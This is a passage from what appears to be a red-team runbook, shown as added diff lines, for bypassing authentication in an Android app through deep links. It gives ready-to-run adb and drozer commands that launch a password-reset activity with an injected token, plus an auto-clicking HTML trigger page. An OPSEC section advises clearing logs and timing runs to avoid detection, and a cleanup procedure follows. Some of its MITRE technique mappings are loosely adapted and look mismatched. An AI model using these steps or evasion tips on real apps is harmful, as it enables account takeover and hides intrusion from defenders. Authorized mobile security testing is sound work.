|
+
|
|
295
|
+
# Test direct access to authenticated screens
|
|
296
|
+
adb shell am start \
|
|
297
|
+
-a android.intent.action.VIEW \
|
|
298
|
+
-d "myapp://dashboard" \
|
|
299
|
+
com.example.myapp
|
|
300
|
+
|
|
301
|
+
# Test privileged action trigger
|
|
302
|
+
adb shell am start \
|
|
303
|
+
-a android.intent.action.VIEW \
|
|
304
|
+
-d "myapp://reset-password?token=INJECTED" \
|
|
305
|
+
-n com.example.myapp/.ResetPasswordActivity
|
|
306
|
+
```
|
|
307
|
+
|
|
308
|
+
**Expected output on success:**
|
|
309
|
+
```
|
|
310
|
+
Starting: Intent { act=android.intent.action.VIEW dat=myapp://reset-password?token=INJECTED_TOKEN cmp=com.example.myapp/.ResetPasswordActivity }
|
|
311
|
+
```
|
|
312
|
+
|
|
313
|
+
The target activity launches. Observe the device screen.
|
|
314
|
+
|
|
315
|
+
**Fallback — trigger via HTML page (browser-based):**
|
|
316
|
+
```bash
|
|
317
|
+
# Create a trigger page and serve it
|
|
318
|
+
cat > /tmp/trigger.html << 'EOF'
|
|
319
|
+
<html>
|
|
320
|
+
<body>
|
|
321
|
+
<a href="myapp://reset-password?token=INJECTED" id="link">Click</a>
|
|
322
|
+
<script>document.getElementById('link').click();</script>
|
|
323
|
+
</body>
|
|
324
|
+
</html>
|
|
325
|
+
EOF
|
|
326
|
+
|
|
327
|
+
# Push to device and open in browser
|
|
328
|
+
adb push /tmp/trigger.html /sdcard/trigger.html
|
|
329
|
+
adb shell am start -a android.intent.action.VIEW -d "file:///sdcard/trigger.html"
|
|
330
|
+
```
|
|
331
|
+
|
|
332
|
+
**Fallback — drozer intent trigger:**
|
|
333
|
+
```bash
|
|
334
|
+
# Connect drozer agent on device
|
|
335
|
+
adb forward tcp:31415 tcp:31415
|
|
336
|
+
drozer console connect
|
|
337
|
+
|
|
338
|
+
# Send intent via drozer
|
|
339
|
+
run app.activity.start \
|
|
340
|
+
--action android.intent.action.VIEW \
|
|
341
|
+
--data-uri "myapp://reset-password?token=INJECTED" \
|
|
342
|
+
--component com.example.myapp com.example.myapp.ResetPasswordActivity
|
|
343
|
+
```
|
|
344
|
+
|
|
345
|
+
---
|
|
346
|
+
|
|
347
|
+
### Step 7: Confirm Authentication Bypass and Access
|
|
348
|
+
|
|
349
|
+
**Observe on device:**
|
|
350
|
+
- Does the app navigate to the password reset screen without sending an email?
|
|
351
|
+
- Does the app allow setting a new password with the injected token?
|
|
352
|
+
- Does the app navigate to a dashboard/protected screen without login?
|
|
353
|
+
|
|
354
|
+
**Capture evidence:**
|
|
355
|
+
|
|
356
|
+
```bash
|
|
357
|
+
# Screenshot the result
|
|
358
|
+
adb shell screencap -p /sdcard/bypass_evidence.png
|
|
359
|
+
adb pull /sdcard/bypass_evidence.png ./evidence/m005_bypass_$(date +%Y%m%d_%H%M%S).png
|
|
360
|
+
|
|
361
|
+
# Screen record the full attack flow
|
|
362
|
+
adb shell screenrecord /sdcard/attack_flow.mp4 &
|
|
363
|
+
RECORD_PID=$!
|
|
364
|
+
# ... execute the attack steps ...
|
|
365
|
+
kill $RECORD_PID
|
|
366
|
+
adb pull /sdcard/attack_flow.mp4 ./evidence/
|
|
367
|
+
|
|
368
|
+
# Capture logcat output during the attack for PoC
|
|
369
|
+
adb logcat -c # clear log buffer
|
|
370
|
+
adb shell am start -a android.intent.action.VIEW -d "myapp://reset-password?token=INJECTED" com.example.myapp
|
|
371
|
+
adb logcat -d > ./evidence/logcat_m005.txt
|
|
372
|
+
```
|
|
373
|
+
|
|
374
|
+
**Capture network traffic (optional — validate no server-side verification):**
|
|
375
|
+
```bash
|
|
376
|
+
# If using Burp Suite proxy on device
|
|
377
|
+
adb shell settings put global http_proxy <burp_ip>:8080
|
|
378
|
+
# Then trigger the deep link and check Burp for outgoing verification requests
|
|
379
|
+
# Absence of verification request = confirmed client-side only validation
|
|
380
|
+
```
|
|
381
|
+
|
|
382
|
+
---
|
|
383
|
+
|
|
384
|
+
## Real-World Reference
|
|
385
|
+
|
|
386
|
+
**Attack:** `myapp://reset-password?token=INJECTED` triggers password reset without email verification.
|
|
387
|
+
|
|
388
|
+
**Flow breakdown:**
|
|
389
|
+
1. Legitimate flow: User clicks email link → `myapp://reset-password?token=<server_generated_token>` → app validates token with backend → allows password reset
|
|
390
|
+
2. Attack flow: Attacker triggers `myapp://reset-password?token=INJECTED` via ADB → app reads token from URI → proceeds without backend validation → password reset screen accessible without email
|
|
391
|
+
|
|
392
|
+
**Historical real-world cases:**
|
|
393
|
+
- **Grab (2019):** Deep link injection allowed account takeover via forged ride-booking deep links
|
|
394
|
+
- **Airbnb (HackerOne):** OAuth token leakage via deep link interception in third-party apps
|
|
395
|
+
- **Facebook (2014):** Deep link exposed authenticated WebViews to external URI schemes
|
|
396
|
+
- **Starbucks:** Deep link allowed order placement without authentication on certain endpoints
|
|
397
|
+
- **CVE-2020-0096:** StrandHogg — malicious apps intercept deep links via task affinity hijacking
|
|
398
|
+
|
|
399
|
+
---
|
|
400
|
+
|
|
401
|
+
## MITRE ATT&CK Mapping
|
|
402
|
+
|
|
403
|
+
| Step | Tactic | Technique | Sub-technique | Description |
|
|
404
|
+
|---|---|---|---|---|
|
|
405
|
+
| 1 — Pull & decompile APK | Reconnaissance | T1430 — Location Tracking (adapt: app recon) | — | Gathering information about target application structure |
|
|
406
|
+
| 2 — Extract AndroidManifest | Discovery | T1418 — Software Discovery | T1418.001 — Security Software Discovery | Enumerating application components and attack surface |
|
|
407
|
+
| 3 — Analyze deep link handlers | Discovery | T1420 — File and Directory Discovery | — | Examining app code for authentication logic weaknesses |
|
|
408
|
+
| 4 — Craft malicious deep link | Resource Development | T1587 — Develop Capabilities | T1587.001 — Malware (adapt: crafted payload) | Constructing the injection payload |
|
|
409
|
+
| 5 — Trigger via ADB | Execution | T1626 — Abuse Elevation Control Mechanism | T1626.001 — Setuid and Setgid (adapt: intent abuse) | Delivering the malicious intent to the target activity |
|
|
410
|
+
| 6 — Bypass authentication flow | Defense Evasion | T1626 — Abuse Elevation Control Mechanism | — | Circumventing authentication controls via direct activity launch |
|
|
411
|
+
| 7 — Access protected screens | Initial Access / Privilege Escalation | T1078 — Valid Accounts | T1078.001 — Default Accounts (adapt: bypassed auth) | Gaining unauthorized access to authenticated application state |
|
|
412
|
+
|
|
413
|
+
---
|
|
414
|
+
|
|
415
|
+
## Detection & OPSEC
|
|
416
|
+
|
|
417
|
+
### How This Attack Is Detected
|
|
418
|
+
|
|
419
|
+
| Detection Point | Signal | Detection Tool |
|
|
420
|
+
|---|---|---|
|
|
421
|
+
| ADB connection | USB debugging auth prompt on device; ADB daemon logs | Device OS / MDM |
|
|
422
|
+
| `am start` commands | Android system logs (`adb logcat ActivityManager`) capture intent launches with source `adb` tag | SIEM with mobile log ingestion |
|
|
423
|
+
| Unexpected activity launch | Activity launched without preceding login flow; no valid session token in memory | App-level analytics / RASP |
|
|
424
|
+
| Network anomaly | Password reset flow triggered with no preceding email-click event | Server-side analytics |
|
|
425
|
+
| Frida / hooking | Frida gadget or server process visible in device process list | EDR / MTD solutions |
|
|
426
|
+
|
|
427
|
+
### Reducing Detection Risk During Authorized Engagement
|
|
428
|
+
|
|
429
|
+
- **Minimize ADB footprint:** Use `adb shell am start` only; avoid installing additional tools on device
|
|
430
|
+
- **Clear logcat before and after:** `adb logcat -c` to remove pre-existing logs; note this itself may be logged by MDM
|
|
431
|
+
- **Use physical trigger over ADB-over-network:** ADB-over-TCP (port 5555) is more detectable than USB ADB
|
|
432
|
+
- **Time execution during low-traffic windows** to avoid anomaly detection on server-side authentication logs
|
|
433
|
+
- **Validate scope:** Confirm the specific device UDID and app version are in scope before connecting
|
|
434
|
+
- **Use screen recording instead of screenshots** to document without generating multiple artifact files on device
|
|
435
|
+
|
|
436
|
+
### Artifacts Left Behind
|
|
437
|
+
|
|
438
|
+
| Artifact | Location | Notes |
|
|
439
|
+
|---|---|---|
|
|
440
|
+
| ADB auth RSA key | `/data/misc/adb/adb_keys` (device) | Device trusts your host permanently until removed |
|
|
441
|
+
| Logcat entries | Android system log (volatile, overwrites) | Survives if MDM collects logs |
|
|
442
|
+
| Screencap / screenrecord files | `/sdcard/` on device | Must be manually cleaned |
|
|
443
|
+
| trigger.html | `/sdcard/trigger.html` | If browser-based trigger method used |
|
|
444
|
+
| Network request logs | Server-side (password reset attempts) | Outside attacker control — log with caution |
|
|
445
|
+
| Frida server binary | `/data/local/tmp/frida-server` (if used) | Must be removed |
|
|
446
|
+
|
|
447
|
+
---
|
|
448
|
+
|
|
449
|
+
## Cleanup
|
|
450
|
+
|
|
451
|
+
```bash
|
|
452
|
+
# 1. Remove files pushed to device
|
|
453
|
+
adb shell rm -f /sdcard/bypass_evidence.png
|
|
454
|
+
adb shell rm -f /sdcard/attack_flow.mp4
|
|
455
|
+
adb shell rm -f /sdcard/trigger.html
|
|
456
|
+
|
|
457
|
+
# 2. Remove Frida server if deployed
|
|
458
|
+
adb shell rm -f /data/local/tmp/frida-server
|
|
459
|
+
|
|
460
|
+
# 3. Remove ADB authorization from device
|
|
461
|
+
# On device: Settings → Developer Options → Revoke USB debugging authorizations
|
|
462
|
+
|
|
463
|
+
# 4. Remove your ADB key from device authorized keys (requires root or factory reset)
|
|
464
|
+
# adb shell su -c "rm /data/misc/adb/adb_keys" # root only
|
|
465
|
+
|
|
466
|
+
# 5. Clear logcat buffer on device
|
|
467
|
+
adb logcat -c
|
|
468
|
+
|
|
469
|
+
# 6. Disable ADB over TCP if it was enabled during engagement
|
|
470
|
+
adb tcpip 5555 # Was enabled — disable by rebooting device or:
|
|
471
|
+
adb shell setprop service.adb.tcp.port -1
|
|
472
|
+
adb shell stop adbd
|
|
473
|
+
adb shell start adbd
|
|
474
|
+
|
|
475
|
+
# 7. Restore proxy settings if modified for Burp
|
|
476
|
+
adb shell settings delete global http_proxy
|
|
477
|
+
adb shell settings delete global global_http_proxy_host
|
|
478
|
+
adb shell settings delete global global_http_proxy_port
|
|
479
|
+
|
|
480
|
+
# 8. Verify cleanup
|
|
481
|
+
adb shell ls /sdcard/ | grep -E "evidence|trigger|attack"
|
|
482
|
+
adb shell ls /data/local/tmp/ | grep frida
|
|
483
|
+
|
|
484
|
+
# 9. Disconnect ADB
|
|
485
|
+
adb disconnect
|
|
486
|
+
```
|
|
487
|
+
|
|
488
|
+
---
|
|
489
|
+
|
|
490
|
+
## References
|
|
491
|
+
|
|
492
|
+
| Resource | URL |
|
|
493
|
+
|---|---|
|
|
494
|
+
| Android Deep Links Documentation | https://developer.android.com/training/app-links/deep-linking |
|
|
495
|
+
| Android Intent Security (OWASP MASTG) | https://mas.owasp.org/MASTG/tests/android/MASVS-PLATFORM/MASTG-TEST-0028/ |
|
|
496
|
+
| OWASP Mobile Top 10 — M1: Improper Credential Usage | https://owasp.org/www-project-mobile-top-10/ |
|
|
497
|
+
| apktool | https://apktool.org/ |
|
|
498
|
+
| jadx | https://github.com/skylot/jadx |
|
|
499
|
+
| drozer | https://github.com/WithSecureLabs/drozer |
|
|
500
|
+
| Frida | https://frida.re/ |
|
|
501
|
+
| MITRE T1626 — Abuse Elevation Control Mechanism | https://attack.mitre.org/techniques/T1626/ |
|
|
502
|
+
| MITRE T1078 — Valid Accounts | https://attack.mitre.org/techniques/T1078/ |
|
|
503
|
+
| ADB Documentation | https://developer.android.com/tools/adb |
|
|
504
|
+
| HackerOne Reports — Deep Link Vulnerabilities | https://hackerone.com/reports?query=deep+link |
|
|
505
|
+
| Android Security Bulletin | https://source.android.com/docs/security/bulletin |
|